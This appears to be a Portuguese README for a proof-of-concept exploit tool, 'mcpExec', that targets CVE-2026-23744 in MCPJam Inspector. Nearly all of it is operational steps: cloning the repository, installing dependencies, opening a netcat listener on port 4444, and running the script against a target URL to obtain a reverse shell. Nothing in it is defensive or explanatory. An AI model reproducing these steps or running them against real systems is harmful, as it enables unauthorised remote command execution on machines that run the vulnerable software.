
PoC para o CVE-2026-23744 para um shell reverso em Python
mcpExec é uma ferramenta que aproveita o CVE-2026-23744 para obter uma reverse shell usando a URL da instalação vulnerável do MCPJam Inspector.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
Para sair do venv:
deactivate
Abra um listener para o exploit funcionar:
nc -nvlp 4444
Este comando fornecerá a reverse shell (se o sistema afetado tiver Python3 instalado).
./mcpExec.py http://localhost:6274